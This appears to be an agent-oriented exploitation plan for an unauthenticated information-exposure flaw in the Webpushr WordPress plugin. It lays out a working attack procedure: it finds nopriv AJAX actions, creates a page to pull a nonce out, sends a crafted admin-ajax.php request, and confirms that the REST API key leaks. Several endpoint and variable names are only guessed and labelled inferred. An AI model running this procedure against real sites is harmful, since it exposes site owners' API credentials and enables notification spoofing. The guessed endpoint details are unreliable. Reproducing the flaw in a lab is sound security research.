Exploitation Research Plan - CVE-2026-24536 (Webpushr Information Exposure)

1. Vulnerability Summary

The Web Push Notifications – Webpushr plugin (<= 4.38.0) contains an unauthenticated information exposure vulnerability. The plugin registers AJAX or REST API endpoints designed for frontend communication but fails to implement sufficient authorization or data filtering. This allows any unauthenticated visitor to query these endpoints and retrieve sensitive configuration details, including REST API keys, Public Keys, or internal plugin settings, which could be leveraged to spoof notifications or gain further insights into the site's environment.

2. Attack Vector Analysis

• Endpoint: admin-ajax.php (AJAX) or /wp-json/webpushr/v1/... (REST API).
• Vulnerable Action (Inferred): webpushr_get_settings, webpushr_fetch_config, or webpushr_get_stats.
• Authentication: None required (unauthenticated).
• Preconditions: The plugin must be active. Some endpoints might only expose data if the "Webpushr" service is partially configured.
• Payload: A simple GET or POST request to the identified action.

3. Code Flow (Inferred)

1. Registration: The plugin uses add_action( 'wp_ajax_nopriv_[ACTION_NAME]', ... ) or register_rest_route() with a permission_callback that returns true.
2. Entry Point: An unauthenticated user sends a request to wp-admin/admin-ajax.php?action=[ACTION_NAME].
3. Processing: The handler function (e.g., get_webpushr_settings()) retrieves data using get_option( 'webpushr_settings' ) or similar.
4. Data Sink: The handler returns the raw options array via wp_send_json(), which includes sensitive keys not meant for public consumption.

4. Nonce Acquisition Strategy

If the vulnerable endpoint requires a nonce (common in admin-ajax.php handlers using check_ajax_referer), follow these steps:

1. Identify Shortcode: Webpushr often enqueues its tracking scripts on the homepage or pages containing its widget.
2. Create Trigger Page: Create a page that forces the plugin to load its scripts.

   wp post create --post_type=page --post_status=publish --post_title="Push Test" --post_content="[webpushr_button]"
   

3. Navigate and Extract:
   • Navigate to the newly created page.
   • Use browser_eval to find the localization object. Webpushr typically uses webpushr_ajax_obj or webpushr_vars.
   • JS Variable Name (Inferred): webpushr_ajax_obj
   • Nonce Key (Inferred): nonce or security
   • Command: browser_eval("window.webpushr_ajax_obj?.nonce")

5. Exploitation Strategy

The goal is to trigger the sensitive data dump via admin-ajax.php.

Step 1: Discovery of Vulnerable Action

Check the plugin source for wp_ajax_nopriv hooks:

grep -rn "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/webpushr-web-push-notifications/

Look for actions like webpushr_get_config.

Step 2: Request Construction

Once the action and potential nonce are identified, send an unauthenticated HTTP request:

Method: POST
URL: http://[TARGET]/wp-admin/admin-ajax.php
Headers: Content-Type: application/x-www-form-urlencoded
Body: action=[ACTION_NAME]&security=[NONCE] (Replace security with the actual parameter name found in check_ajax_referer)

Step 3: Payload Delivery (via http_request tool)

{
  "method": "POST",
  "url": "http://localhost:8080/wp-admin/admin-ajax.php",
  "headers": {
    "Content-Type": "application/x-www-form-urlencoded"
  },
  "params": {
    "action": "webpushr_get_config",
    "security": "REPLACED_WITH_EXTRACTED_NONCE"
  }
}

6. Test Data Setup

1. Install & Activate: Webpushr plugin version 4.38.0.
2. Configure Dummy Data: Use WP-CLI to set fake API keys so the exposure is verifiable.

   wp option update webpushr_settings '{"rest_api_key":"SECRET_API_KEY_12345", "public_key":"PUBLIC_KEY_ABCDE", "tracking_id":"TRK_9999"}'
   

3. Create Page: Create the page for nonce extraction as described in Section 4.

7. Expected Results

• Response Code: 200 OK
• Response Body: A JSON object containing the rest_api_key and other sensitive configuration strings.
• Example Response:

  {
    "success": true,
    "data": {
      "rest_api_key": "SECRET_API_KEY_12345",
      "tracking_id": "TRK_9999",
      "public_key": "..."
    }
  }
  

8. Verification Steps

1. Verify via WP-CLI: Compare the output of the exploit with the actual stored option.

   wp option get webpushr_settings
   

2. Confirm Exposure: Check if the value SECRET_API_KEY_12345 is present in the http_request response body.

9. Alternative Approaches

• REST API Discovery: If no AJAX actions are fruitful, search for REST routes:

  grep -rn "register_rest_route" /var/www/html/wp-content/plugins/webpushr-web-push-notifications/
  

  Check if any route lacks a permission_callback or uses __return_true.
• Global Variable Leakage: Check if the sensitive data is directly localized into the page HTML for all users via wp_localize_script.
  • Navigate to the homepage.
  • Run browser_eval("window.webpushr_ajax_obj") and check if the API key is already present in the object properties.